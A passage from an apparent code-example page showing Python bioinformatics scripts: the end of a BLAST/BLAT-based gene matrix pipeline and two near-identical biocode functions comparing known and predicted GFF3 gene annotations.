                subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
                os.system("cp self_blast.out tmp.out")
                ref_scores=parse_self_blast(open("self_blast.out", "U"))
                subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
                logging.logPrint("starting BLAST")
                try:
                    blast_against_each_genome_blastn(dir_path, processors, filter, gene_path)
                except:
                    print "problem with blastn, exiting"
                    sys.exit()
            elif "blat" == blast:
                logging.logPrint("using blat")
                blat_against_self(gene_path, gene_path, "tmp_blast.out", processors)
                subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
                ref_scores=parse_self_blast(open("self_blast.out", "U"))
                subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
                logging.logPrint("starting BLAT")
                blat_against_each_genome(dir_path,gene_path,processors)
            else:
                pass
        else:
            print "input file format not supported"
            sys.exit()
    find_dups_dev(ref_scores, length, max_plog, min_hlog, clusters, processors)
    if blast=="blat":
        logging.logPrint("BLAT done")
    else:
        logging.logPrint("BLAST done")
    parse_blast_report("false")
    get_unique_lines()
    curr_dir=os.getcwd()
    table_files = glob.glob(os.path.join(curr_dir, "*.filtered.unique"))
    files_and_temp_names = [(str(idx), os.path.join(curr_dir, f))
                            for idx, f in enumerate(table_files)]
    names=[]
    table_list = []
    nr_sorted=sorted(clusters)
    centroid_list = []
    centroid_list.append(" ")
    for x in nr_sorted:
        centroid_list.append(x)
    table_list.append(centroid_list)
    logging.logPrint("starting matrix building")
    new_names,new_table = new_loop(files_and_temp_names, processors, clusters, debug)
    new_table_list = table_list+new_table
    logging.logPrint("matrix built")
    open("ref.list", "a").write("\n")
    for x in nr_sorted:
        open("ref.list", "a").write("%s\n" % x)
    names_out = open("names.txt", "w")
    names_redux = [val for subl in new_names for val in subl]
    for x in names_redux: print >> names_out, "".join(x)
    names_out.close()
    create_bsr_matrix_dev(new_table_list)
    divide_values("bsr_matrix", ref_scores)
    subprocess.check_call("paste ref.list BSR_matrix_values.txt > %s/bsr_matrix_values.txt" % start_dir, shell=True)
    if "T" in f_plog:
        filter_paralogs("%s/bsr_matrix_values.txt" % start_dir, "paralog_ids.txt")
        os.system("cp bsr_matrix_values_filtered.txt %s" % start_dir)
    else:
        pass
    try:
        subprocess.check_call("cp dup_matrix.txt names.txt consensus.pep consensus.fasta duplicate_ids.txt paralog_ids.txt %s" % ap, shell=True, stderr=open(os.devnull, 'w'))
    except:
        sys.exc_clear()
    """new code to rename files according to a prefix"""
    import datetime
    timestamp = datetime.datetime.now()
    rename = str(timestamp.year), str(timestamp.month), str(timestamp.day), str(timestamp.hour), str(timestamp.minute), str(timestamp.second)
    os.chdir("%s" % ap)
    if "NULL" in prefix:
        os.system("mv dup_matrix.txt %s_dup_matrix.txt" % "".join(rename))
        os.system("mv names.txt %s_names.txt" % "".join(rename))
        os.system("mv duplicate_ids.txt %s_duplicate_ids.txt" % "".join(rename))
        os.system("mv paralog_ids.txt %s_paralog_ids.txt" % "".join(rename))
        os.system("mv bsr_matrix_values.txt %s_bsr_matrix.txt" % "".join(rename))
        if os.path.isfile("consensus.fasta"):
            os.system("mv consensus.fasta %s_consensus.fasta" % "".join(rename))
        if os.path.isfile("consensus.pep"):
            os.system("mv consensus.pep %s_consensus.pep" % "".join(rename))
    else:
        os.system("mv dup_matrix.txt %s_dup_matrix.txt" % prefix)
        os.system("mv names.txt %s_names.txt" % prefix)
        os.system("mv duplicate_ids.txt %s_duplicate_ids.txt" % prefix)
        os.system("mv paralog_ids.txt %s_paralog_ids.txt" % prefix)
        os.system("mv bsr_matrix_values.txt %s_bsr_matrix.txt" % prefix)
        if os.path.isfile("consensus.fasta"):
            os.system("mv consensus.fasta %s_consensus.fasta" % prefix)
        if os.path.isfile("consensus.pep"):
            os.system("mv consensus.pep %s_consensus.pep" % prefix)
    if "NULL" in prefix:
        outfile = open("%s_run_parameters.txt" % "".join(rename), "w")
    else:
        outfile = open("%s_run_parameters.txt" % prefix, "w")
    print >> outfile, "-d %s \\" % directory
    print >> outfile, "-i %s \\" % id
    print >> outfile, "-f %s \\" % filter
    print >> outfile, "-p %s \\" % processors
    print >> outfile, "-g %s \\" % genes
    print >> outfile, "-c %s \\" % cluster_method
    print >> outfile, "-b %s \\" % blast
    print >> outfile, "-l %s \\" % length
    print >> outfile, "-m %s \\" % max_plog
    print >> outfile, "-n %s \\" % min_hlog
    print >> outfile, "-t %s \\" % f_plog
    print >> outfile, "-k %s \\" % keep
    print >> outfile, "-s %s \\" % filter_peps
    print >> outfile, "-e %s \\" % filter_scaffolds
    print >> outfile, "-x %s \\" % prefix
    print >> outfile, "-z %s" % debug
    print >> outfile, "temp data stored here if kept: %s" % fastadir
    outfile.close()
    logging.logPrint("all Done")
    if "T" == keep:
        pass
    else:
        os.system("rm -rf %s" % fastadir)
    os.chdir("%s" % ap)

Example 155

Project: biocode Source File: compare_gene_structures.py
def process_files(args):
    (assemblies_1, features_1) = biocodegff.get_gff3_features(args.annotation_1)
    (assemblies_2, features_2) = biocodegff.get_gff3_features(args.annotation_2)


    a_exons = []                                    ## Set contains only uniq exons from known annotation, since multiple same exons can appear in a gff file.  
    p_exons = []                                    ## For predicted annotation

    a_gene = []
    p_gene = []

    a_mrna = []
    p_mrna = []

    exon_pred_all = set()
    gene_true = set()
    mrna_true = set()



    chr = []

    a_cds = []                                   
    p_cds = []                                   

    a_cd = []
    p_cd= []
    chr = []

    true_pred_file = args.output_dir + '/true_predicted_genes.txt'
    true_file = open(true_pred_file,'w')
    true_file.write("Known\tPredicted\n")
    
    for asm_id in assemblies_1:                                                                                     ## Iterate through each chromosome from the known ref annotation        
        assembly_1 = assemblies_1[asm_id]
        assembly_2 = assemblies_2.get(asm_id,-1)                                                                    ## Find that chromosome in the predicted gff file
        genes_1 = assembly_1.genes()                                                                                ## All genes from known annotation
        anno_exons = set()

        for gene_1 in sorted(genes_1) :                                                                                     ## Add unique gene, mrna , exon features from known annotation to get each known feature total count 
            gene_1_loc = gene_1.location_on(assembly_1)
            cord_a = cordinate(asm_id,gene_1_loc)      ## Use chromosome id+start+stop+strand as a string to determine uniqueness.
            if (cord_a not in a_gene) :
                a_gene.append(cord_a)

            ex_start = []
            ex_stop = []
            for mrna_1 in sorted(gene_1.mRNAs()) :
                mrna_1_loc = mrna_1.location_on(assembly_1)
                cord = cordinate(asm_id,mrna_1_loc)
                if (cord not in a_mrna) :
                    a_mrna.append(cord)
                    
                if (args.feature == "Exon") :
                    feat_1 = mrna_1.exons()
                    
                if (args.feature == "CDS") :
                    feat_1 = mrna_1.CDSs()
                    
                for exon_1 in sorted(feat_1) :
                    exon_1_loc = exon_1.location_on(assembly_1)
                    cord = cordinate(asm_id, exon_1_loc)
                    if (cord not in a_exons) :
                        a_exons.append(cord)
                    anno_exons.add(cord)

                    
                    ex_start.append(exon_1_loc.fmin)
                    ex_stop.append(exon_1_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            if (len(ex_start) >= 1) :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" +  str(gene_1_loc.strand)
                
            else :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(gene_1_loc.fmin) + ":" + str(gene_1_loc.fmax) + ":" +  str(gene_1_loc.strand)
                
                
            if (cord_a not in a_cd) :
                a_cds.append(cds1)
                a_cd.append(cord_a)
             
                    

        if (type(assembly_2) is int) :                     ##    If the chromosome is not found in prediected file, move to next chromosome.
            continue
        

        genes_2 = assembly_2.genes()                      ## All genes from predicted annotation.
        chr.append(asm_id)                                ## Append all found chromosome in a list.
        pred_exons = set()

        for gene_2 in sorted(genes_2) :                           ## Add unique gene, mrna , exon features from predicted annotation to get each predicted feature total count.  
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_p = cordinate(asm_id, gene_2_loc)
            if (cord_p not in p_gene) :
                p_gene.append(cord_p)

            ex_start = []
            ex_stop = []
            
            for mrna_2 in sorted(gene_2.mRNAs()) :
                mrna_2_loc = mrna_2.location_on(assembly_2)
                cord = cordinate(asm_id, mrna_2_loc)
                if (cord not in p_mrna) :
                    p_mrna.append(cord)

                if (args.feature == "Exon") :
                    feat_2 = mrna_2.exons()
                    
                if (args.feature == "CDS") :
                    feat_2 = mrna_2.CDSs()
                    
                for exon_2 in sorted(feat_2) :
                    exon_2_loc = exon_2.location_on(assembly_2)
                    cord = cordinate(asm_id ,exon_2_loc)
                    pred_exons.add(cord)
                    if (cord not in p_exons) :
                        p_exons.append(cord)
                        
                    ex_start.append(exon_2_loc.fmin)
                    ex_stop.append(exon_2_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            
            if (len(ex_start) >= 1) :   
                cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                
            else :
                cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                

            if (cord_p not in p_cd) :
                p_cds.append(cds2)
                p_cd.append(cord_p)

                    
        exon_pred_all.update(pred_exons.intersection(anno_exons)) # true exons
        
        
        for gene_2 in sorted(genes_2) :                                         ## From the predicted feature determine the true once. Iterate through each predicted gene sorted by cordinate
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_g = cordinate(asm_id, gene_2_loc)
            
            if (cord_g in gene_true) :                                          ## To prevent duplication, check if the feature already exists in the set of truly predicted gene.
                continue
            
            ex_mrna2 = set()
            			
        
            for gene_1 in sorted(genes_1) :
                ex_mrna1 = set()
                gene_1_loc = gene_1.location_on(assembly_1)
                if (gene_1_loc.strand != gene_2_loc.strand) :
                    continue
                if (gene_2.overlaps_with(gene_1)) :
                    
                    for mrna_2 in sorted(gene_2.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_2 = mrna_2.exons()
                        if (args.feature == "CDS") :
                            feat_2 = mrna_2.CDSs()
                            
                        for exon_2 in sorted(feat_2) :
                            exon_2_loc = exon_2.location_on(assembly_2)
                            cord2 = cordinate(asm_id , exon_2_loc)
                            ex_mrna2.add(cord2)
                            
                    for mrna_1 in sorted(gene_1.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_1 = mrna_1.exons()
                    
                        if (args.feature == "CDS") :
                            feat_1 = mrna_1.CDSs()
                        
                        for exon_1 in sorted(feat_1) :
                            exon_1_loc = exon_1.location_on(assembly_1)
                            cord1 = cordinate(asm_id, exon_1_loc)
                            ex_mrna1.add(cord1)
                    
                    ex_union = ex_mrna1.union(ex_mrna2)
                    if (len(ex_union) ==  len(ex_mrna1) and len(ex_union) == len(ex_mrna2)) :
                        gene_true.add(cord_g)
                        true_file.write(gene_1.id+"\t"+gene_2.id+"\n")
                        break
          
    for asm_id in assemblies_2:                                                  ## Iterate through each chromosome from the predicted annotation
        if asm_id not in chr :
            assembly_2 = assemblies_2.get(asm_id,-1)                             ## Find that chromosome in the predicted gff file which is not found in known annotation
            genes_2 = assembly_2.genes()                                         ## Add  genes, mrna, exon features from predicted annotation to total predicted feature set.
            
            for gene_2 in sorted(genes_2) :
                gene_2_loc = gene_2.location_on(assembly_2)
                cord_p = cordinate(asm_id ,gene_2_loc)
                if (cord_p not in p_gene) :
                    p_gene.append(cord_p)

                ex_start = []
                ex_stop = []
                
                for mrna_2 in sorted(gene_2.mRNAs()) :
                    mrna_2_loc = mrna_2.location_on(assembly_2)
                    cord = cordinate(asm_id , mrna_2_loc)
                    if (cord not in p_mrna) :
                        p_mrna.append(cord)

                    if (args.feature == "Exon") :
                        feat_2 = mrna_2.exons()
                    if (args.feature == "CDS") :
                        feat_2 = mrna_2.CDSs()
                        
                    for exon_2 in sorted(feat_2) :
                        exon_2_loc = exon_2.location_on(assembly_2)
                        cord = cordinate(asm_id ,exon_2_loc)
                        if (cord not in p_exons) :
                            p_exons.append(cord)
                            
                
                        ex_start.append(exon_2_loc.fmin)
                        ex_stop.append(exon_2_loc.fmax)

                ex_start.sort()
                ex_stop.sort()
                if (len(ex_start) >= 1) :
                    cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                    
                else :
                    cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                    

                if (cord_p not in p_cd) :
                    p_cds.append(cds2)
                    p_cd.append(cord_p)
                            

    

    #Calculate SN/SP for bases 

    (a_base_val, p_base_val, true_base) = base_comparison(p_exons,a_exons)

    base_sn = (true_base/a_base_val) * 100                                 
    base_sp = (true_base/p_base_val) * 100


    #Calculate SN/SP for exons 
    annotated_exon = len(a_exons)
    predicted_exon = len(p_exons)
    true_pred_exon = len(exon_pred_all)
    
    exon_sn = (true_pred_exon/annotated_exon) * 100                                 
    exon_sp = (true_pred_exon/predicted_exon) * 100

    #Calculate SN/SP for genes 

    annotated_gene = len(a_gene)
    predicted_gene = len(p_gene)
    true_pred_gene = len(gene_true)

    
    gene_sn = (true_pred_gene/annotated_gene) * 100                                 
    gene_sp = (true_pred_gene/predicted_gene) * 100
    print("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    print("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp))
    print(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp))
    print("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp))
    
    out_file = args.output_dir + '/summary.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')

    fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    fout.write("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp)+"\n")
    fout.write(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp)+"\n")
    fout.write("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp)+"\n\n")


    arr_pred = compare_cds(p_cds,a_cds,"pred")
    arr_known = compare_cds(a_cds,p_cds,"known")
    arr_pred_same = compare_cds(p_cds,p_cds,"pred_same")
    
    new_gene = arr_pred[2]
    gene_merge = arr_pred[3]
    gene_found = arr_pred[0]
    gene_opp = arr_pred[1]       
    gene_missing = arr_known[2]
    gene = arr_known[0]
    gene_opp_known = arr_known[1]
    gene_split = arr_known[3]
    gene_pred_overlap_opp = arr_pred_same[1]


            
    print ("1. No. of known gene : ",len(a_cds))
    print ("2. No. of predicted gene : ",len(p_cds))
    print ("3. No. of predicted gene overlapping  0 known gene (new gene): ",new_gene)
    print ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : ",gene_merge)
    print ("5. No. of predicted gene overlaping 1 known gene : ",gene_found)
    print ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : ",gene_opp)
    print ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundaries) : ",true_pred_gene)
    print ("8. No. of predicted gene overlapping >= 1 predicted gene in opp strand : ",gene_pred_overlap_opp)
    
    print ("9. No. of known gene overlapping  0 predicted gene (gene missing): ",gene_missing)
    print ("10. No. of known gene overlapping > 1 predicted gene(gene split) : ",gene_split)
    print ("11. No. of known gene overlaping 1 predicted gene : ",gene)
    print ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : ",gene_opp_known)

    
    out_file = args.output_dir + '/final_stats.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')
    
    fout.write ("1. No. of known gene : " + str(len(a_cds)) + "\n")
    fout.write ("2. No. of predicted gene : " + str(len(p_cds)) + "\n")
    fout.write ("3. No. of predicted gene overlapping  0 known gene (new gene): " + str(new_gene) + "\n")
    fout.write ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : " + str(gene_merge) + "\n")
    fout.write ("5. No. of predicted gene overlaping 1 known gene : " + str(gene_found) + "\n")
    fout.write ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : " + str(gene_opp) + "\n")
    fout.write ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundary) : " + str(true_pred_gene) + "\n")
    fout.write ("8. No. of predicted gene overlapping >= 1  predicted gene in opp strand : " + str(gene_pred_overlap_opp) + "\n")
    fout.write ("9. No. of known gene overlapping  0 predicted gene (gene missing): " + str(gene_missing) + "\n")
    fout.write ("10. No. of known gene overlapping > 1 predicted gene (gene_split): " + str(gene_split) + "\n")
    fout.write ("11. No. of known gene overlaping 1 predicted gene : " + str(gene) + "\n")
    fout.write ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : " + str(gene_opp_known) + "\n")



    true_pred_file = args.output_dir + '/true_pred.txt'
    fout_true = open(true_pred_file,'w')
    for true_gene in gene_true :
        fout_true.write(true_gene+"\n")
    


    #Clean up
    delete_file = ['exon_1.bed','exon_2.bed','exon_1_merged.bed','exon_2_merged.bed','exon_1_2_intersect.bed']
    for f in delete_file :
        cmd = "rm " + args.output_dir + "/" + f
        os.system(cmd)

Example 156

Project: biocode Source File: structural_comparison_gff3.py
def process_files(args):
    (assemblies_1, features_1) = biocodegff.get_gff3_features(args.annotation_1)
    (assemblies_2, features_2) = biocodegff.get_gff3_features(args.annotation_2)


    a_exons = []                                    ## Set contains only uniq exons from known annotation, since multiple same exons can appear in a gff file.  
    p_exons = []                                    ## For predicted annotation

    a_gene = []
    p_gene = []

    a_mrna = []
    p_mrna = []

    exon_pred_all = set()
    gene_true = set()
    mrna_true = set()



    chr = []

    a_cds = []                                   
    p_cds = []                                   

    a_cd = []
    p_cd= []
    chr = []

    true_pred_file = args.output_dir + '/true_predicted_genes.txt'
    true_file = open(true_pred_file,'w')
    true_file.write("Known\tPredicted\n")
    
    for asm_id in assemblies_1:                                                                                     ## Iterate through each chromosome from the known ref annotation        
        assembly_1 = assemblies_1[asm_id]
        assembly_2 = assemblies_2.get(asm_id,-1)                                                                    ## Find that chromosome in the predicted gff file
        genes_1 = assembly_1.genes()                                                                                ## All genes from known annotation
        anno_exons = set()

        for gene_1 in sorted(genes_1) :                                                                                     ## Add unique gene, mrna , exon features from known annotation to get each known feature total count 
            gene_1_loc = gene_1.location_on(assembly_1)
            cord_a = cordinate(asm_id,gene_1_loc)      ## Use chromosome id+start+stop+strand as a string to determine uniqueness.
            if (cord_a not in a_gene) :
                a_gene.append(cord_a)

            ex_start = []
            ex_stop = []
            for mrna_1 in sorted(gene_1.mRNAs()) :
                mrna_1_loc = mrna_1.location_on(assembly_1)
                cord = cordinate(asm_id,mrna_1_loc)
                if (cord not in a_mrna) :
                    a_mrna.append(cord)
                    
                if (args.feature == "Exon") :
                    feat_1 = mrna_1.exons()
                    
                if (args.feature == "CDS") :
                    feat_1 = mrna_1.CDSs()
                    
                for exon_1 in sorted(feat_1) :
                    exon_1_loc = exon_1.location_on(assembly_1)
                    cord = cordinate(asm_id, exon_1_loc)
                    if (cord not in a_exons) :
                        a_exons.append(cord)
                    anno_exons.add(cord)

                    
                    ex_start.append(exon_1_loc.fmin)
                    ex_stop.append(exon_1_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            if (len(ex_start) >= 1) :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" +  str(gene_1_loc.strand)
                
            else :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(gene_1_loc.fmin) + ":" + str(gene_1_loc.fmax) + ":" +  str(gene_1_loc.strand)
                
                
            if (cord_a not in a_cd) :
                a_cds.append(cds1)
                a_cd.append(cord_a)
             
                    

        if (type(assembly_2) is int) :                     ##    If the chromosome is not found in prediected file, move to next chromosome.
            continue
        

        genes_2 = assembly_2.genes()                      ## All genes from predicted annotation.
        chr.append(asm_id)                                ## Append all found chromosome in a list.
        pred_exons = set()

        for gene_2 in sorted(genes_2) :                           ## Add unique gene, mrna , exon features from predicted annotation to get each predicted feature total count.  
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_p = cordinate(asm_id, gene_2_loc)
            if (cord_p not in p_gene) :
                p_gene.append(cord_p)

            ex_start = []
            ex_stop = []
            
            for mrna_2 in sorted(gene_2.mRNAs()) :
                mrna_2_loc = mrna_2.location_on(assembly_2)
                cord = cordinate(asm_id, mrna_2_loc)
                if (cord not in p_mrna) :
                    p_mrna.append(cord)

                if (args.feature == "Exon") :
                    feat_2 = mrna_2.exons()
                    
                if (args.feature == "CDS") :
                    feat_2 = mrna_2.CDSs()
                    
                for exon_2 in sorted(feat_2) :
                    exon_2_loc = exon_2.location_on(assembly_2)
                    cord = cordinate(asm_id ,exon_2_loc)
                    pred_exons.add(cord)
                    if (cord not in p_exons) :
                        p_exons.append(cord)
                        
                    ex_start.append(exon_2_loc.fmin)
                    ex_stop.append(exon_2_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            
            if (len(ex_start) >= 1) :   
                cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                
            else :
                cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                

            if (cord_p not in p_cd) :
                p_cds.append(cds2)
                p_cd.append(cord_p)

                    
        exon_pred_all.update(pred_exons.intersection(anno_exons)) # true exons
        
        
        for gene_2 in sorted(genes_2) :                                         ## From the predicted feature determine the true once. Iterate through each predicted gene sorted by cordinate
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_g = cordinate(asm_id, gene_2_loc)
            
            if (cord_g in gene_true) :                                          ## To prevent duplication, check if the feature already exists in the set of truly predicted gene.
                continue
            ex_mrna1 = set()
            ex_mrna2 = set()
			
        
            for gene_1 in sorted(genes_1) :
                gene_1_loc = gene_1.location_on(assembly_1)
                if (gene_1_loc.strand != gene_2_loc.strand) :
                    continue
                if (gene_2.overlaps_with(gene_1)) :
                    for mrna_2 in sorted(gene_2.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_2 = mrna_2.exons()
                        if (args.feature == "CDS") :
                            feat_2 = mrna_2.CDSs()
                            
                        for exon_2 in sorted(feat_2) :
                            exon_2_loc = exon_2.location_on(assembly_2)
                            cord2 = cordinate(asm_id , exon_2_loc)
                            ex_mrna2.add(cord2)
                            
                    for mrna_1 in sorted(gene_1.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_1 = mrna_1.exons()
                    
                        if (args.feature == "CDS") :
                            feat_1 = mrna_1.CDSs()
                        
                        for exon_1 in sorted(feat_1) :
                            exon_1_loc = exon_1.location_on(assembly_1)
                            cord1 = cordinate(asm_id, exon_1_loc)
                            ex_mrna1.add(cord1)
                    
                    ex_union = ex_mrna1.union(ex_mrna2)
                    if (len(ex_union) ==  len(ex_mrna1) and len(ex_union) == len(ex_mrna2)) :
                        gene_true.add(cord_g)
                        true_file.write(gene_1.id+"\t"+gene_2.id+"\n")
                        break
          
    for asm_id in assemblies_2:                                                  ## Iterate through each chromosome from the predicted annotation
        if asm_id not in chr :
            assembly_2 = assemblies_2.get(asm_id,-1)                             ## Find that chromosome in the predicted gff file which is not found in known annotation
            genes_2 = assembly_2.genes()                                         ## Add  genes, mrna, exon features from predicted annotation to total predicted feature set.
            
            for gene_2 in sorted(genes_2) :
                gene_2_loc = gene_2.location_on(assembly_2)
                cord_p = cordinate(asm_id ,gene_2_loc)
                if (cord_p not in p_gene) :
                    p_gene.append(cord_p)

                ex_start = []
                ex_stop = []
                
                for mrna_2 in sorted(gene_2.mRNAs()) :
                    mrna_2_loc = mrna_2.location_on(assembly_2)
                    cord = cordinate(asm_id , mrna_2_loc)
                    if (cord not in p_mrna) :
                        p_mrna.append(cord)

                    if (args.feature == "Exon") :
                        feat_2 = mrna_2.exons()
                    if (args.feature == "CDS") :
                        feat_2 = mrna_2.CDSs()
                        
                    for exon_2 in sorted(feat_2) :
                        exon_2_loc = exon_2.location_on(assembly_2)
                        cord = cordinate(asm_id ,exon_2_loc)
                        if (cord not in p_exons) :
                            p_exons.append(cord)
                            
                
                        ex_start.append(exon_2_loc.fmin)
                        ex_stop.append(exon_2_loc.fmax)

                ex_start.sort()
                ex_stop.sort()
                if (len(ex_start) >= 1) :
                    cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                    
                else :
                    cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                    

                if (cord_p not in p_cd) :
                    p_cds.append(cds2)
                    p_cd.append(cord_p)
                            

    

    #Calculate SN/SP for bases 

    (a_base_val, p_base_val, true_base) = base_comparison(p_exons,a_exons)

    base_sn = (true_base/a_base_val) * 100                                 
    base_sp = (true_base/p_base_val) * 100


    #Calculate SN/SP for exons 
    annotated_exon = len(a_exons)
    predicted_exon = len(p_exons)
    true_pred_exon = len(exon_pred_all)
    
    exon_sn = (true_pred_exon/annotated_exon) * 100                                 
    exon_sp = (true_pred_exon/predicted_exon) * 100

    #Calculate SN/SP for genes 

    annotated_gene = len(a_gene)
    predicted_gene = len(p_gene)
    true_pred_gene = len(gene_true)

    
    gene_sn = (true_pred_gene/annotated_gene) * 100                                 
    gene_sp = (true_pred_gene/predicted_gene) * 100
    print("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    print("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp))
    print(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp))
    print("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp))
    
    out_file = args.output_dir + '/summary.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')

    fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    fout.write("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp)+"\n")
    fout.write(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp)+"\n")
    fout.write("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp)+"\n\n")


    arr_pred = compare_cds(p_cds,a_cds,"pred")
    arr_known = compare_cds(a_cds,p_cds,"known")
    arr_pred_same = compare_cds(p_cds,p_cds,"pred_same")
    
    new_gene = arr_pred[2]
    gene_merge = arr_pred[3]
    gene_found = arr_pred[0]
    gene_opp = arr_pred[1]       
    gene_missing = arr_known[2]
    gene = arr_known[0]
    gene_opp_known = arr_known[1]
    gene_split = arr_known[3]
    gene_pred_overlap_opp = arr_pred_same[1]


            
    print ("1. No. of known gene : ",len(a_cds))
    print ("2. No. of predicted gene : ",len(p_cds))
    print ("3. No. of predicted gene overlapping  0 known gene (new gene): ",new_gene)
    print ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : ",gene_merge)
    print ("5. No. of predicted gene overlaping 1 known gene : ",gene_found)
    print ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : ",gene_opp)
    print ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundaries) : ",true_pred_gene)
    print ("8. No. of predicted gene overlapping >= 1 predicted gene in opp strand : ",gene_pred_overlap_opp)
    
    print ("9. No. of known gene overlapping  0 predicted gene (gene missing): ",gene_missing)
    print ("10. No. of known gene overlapping > 1 predicted gene(gene split) : ",gene_split)
    print ("11. No. of known gene overlaping 1 predicted gene : ",gene)
    print ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : ",gene_opp_known)

    
    out_file = args.output_dir + '/final_stats.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')
    
    fout.write ("1. No. of known gene : " + str(len(a_cds)) + "\n")
    fout.write ("2. No. of predicted gene : " + str(len(p_cds)) + "\n")
    fout.write ("3. No. of predicted gene overlapping  0 known gene (new gene): " + str(new_gene) + "\n")
    fout.write ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : " + str(gene_merge) + "\n")
    fout.write ("5. No. of predicted gene overlaping 1 known gene : " + str(gene_found) + "\n")
    fout.write ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : " + str(gene_opp) + "\n")
    fout.write ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundary) : " + str(true_pred_gene) + "\n")
    fout.write ("8. No. of predicted gene overlapping >= 1  predicted gene in opp strand : " + str(gene_pred_overlap_opp) + "\n")
    fout.write ("9. No. of known gene overlapping  0 predicted gene (gene missing): " + str(gene_missing) + "\n")
    fout.write ("10. No. of known gene overlapping > 1 predicted gene (gene_split): " + str(gene_split) + "\n")
    fout.write ("11. No. of known gene overlaping 1 predicted gene : " + str(gene) + "\n")
